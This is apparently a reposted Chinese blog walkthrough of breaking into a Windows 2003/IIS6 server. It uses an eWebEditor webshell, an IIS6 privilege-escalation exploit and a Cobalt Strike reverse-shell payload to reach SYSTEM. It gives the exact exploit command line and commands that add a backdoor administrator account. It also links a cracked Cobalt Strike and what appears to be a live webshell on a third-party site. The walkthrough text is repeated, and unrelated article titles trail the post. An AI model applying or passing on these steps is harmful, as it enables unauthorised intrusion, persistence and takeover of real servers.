一次使用iis6+cobaltstrike提权
来源:互联网 发布:linux 安装hadoop 编辑:程序博客网 时间:2024/06/05 06:37
介绍
相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 ..
首先上传 cmd.exe iis6.exe 到Z:\RECYCLER\ 也就是回收站
因为支持aspx 所以可以直接执行命令
算了 上个图吧 无图无真相不是
因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下 权限很大
接下来我们等一下 打开cobaltstrike 有如下选项
我们选择左下角的ADD增加一个Listeners(监听)
设置如左图 然后点击Save
这样就算增加了一个监听的payload端口是5656
在然后选择attacks选项
选择如左图
选择了Generate以后 保存的位置 跟名字
随便起一个名字
接下来最后一步执行..(草 图好多)
不一会就会反弹回来
为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell
添加上管理员即可,终端号可以在注册表查询
Armitage是一个图形化的metasploit网络攻击管理工具,它可视化你的攻击目标,推荐exploit和公开了metasploit框架的高级功能。
Armitage是一款Java写的Metasploit图形界面的攻击软件,可以用它结合Metasploit已知的exploit来针对存在的漏洞自动化攻击。bt5、kali linx 下集成免费版本Armitage,Cobalt Strike是它的商业版本,乃们懂得,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动攻击测试。但是不对我大天朝出口,免费使21天,剩下的你们懂的,不喜欢图形界面的筒子请无视。友情提示:win版本请自测有无捆绑。
下载地址如下 http://www.freebuf.com/tools/8445.html(破解版)http://xxoo.com.cn/ewebeditor/UploadFile/2013717212415335.asa win2k3+支持aspx
相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 ..
首先上传 cmd.exe iis6.exe 到Z:\RECYCLER\ 也就是回收站
因为支持aspx 所以可以直接执行命令
算了 上个图吧 无图无真相不是
因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下 权限很大
接下来我们等一下 打开cobaltstrike 有如下选项
我们选择左下角的ADD增加一个Listeners(监听)
设置如左图 然后点击Save
这样就算增加了一个监听的payload端口是5656
在然后选择attacks选项
选择如左图
选择了Generate以后 保存的位置 跟名字
随便起一个名字
接下来最后一步执行..(草 图好多)
cmd路径Z:\RECYCLER\cmd.exe语句:/c Z:\RECYCLER\iis6.xtx "Z:\RECYCLER\eset.exe"
不一会就会反弹回来
为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell
net user admin 123 /add net localgroup administrators admin /add
添加上管理员即可,终端号可以在注册表查询
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
- 一次使用iis6+cobaltstrike提权
- IIS6.0使用技巧
- IIS6.0中GZip使用
- Metasploit如何派生一个shell给cobaltstrike
- iis6配置使用页面Gzip压缩提速
- 使用IIS6.0搭建FTP服务器
- windows server2003 IIS6.0 HTTP 404错误的一次处理经验
- exp的一次使用
- CentOS 第 一次使用
- iis6.0下“请求的资源正在使用中”
- iis6.0 请求的资源在使用中 错误解决办法
- windows2003(iis6.0)下使用WScript.Shell[转]
- Win2003Server IIS6.0 下,使用ASP 伪静态html页面
- 解决win2003 iis6 的请求的资源在使用中
- 解决win2003 iis6 的"请求的资源在使用中"
- 使用IIS6.0配置ASP动态Web网站
- 使用iis6的web园,提升程序情能
- Http Handler由IIS6到IIS7的使用问题
- MTD(1)---nand flash的基本知识
- .net 操作cookie
- maven的配置和使用
- 习题2-9 分数化小数
- esapi api
- 一次使用iis6+cobaltstrike提权
- solr4.4在windows7安装
- hibernate 配置 mappingResources、mappingLocations、mappingDirectoryLocations、mappingJarLocations
- CVTE 嵌入式软件工程师 二面
- TCP校验和的原理和实现
- 电脑蓝屏故障的原因以及解决方法
- JQuery上传插件Uploadify详解及其中文按钮解决方案
- iOS 数据持久化之使用NSUserDefaults存储数据
- .NET 页面间传值的几种方法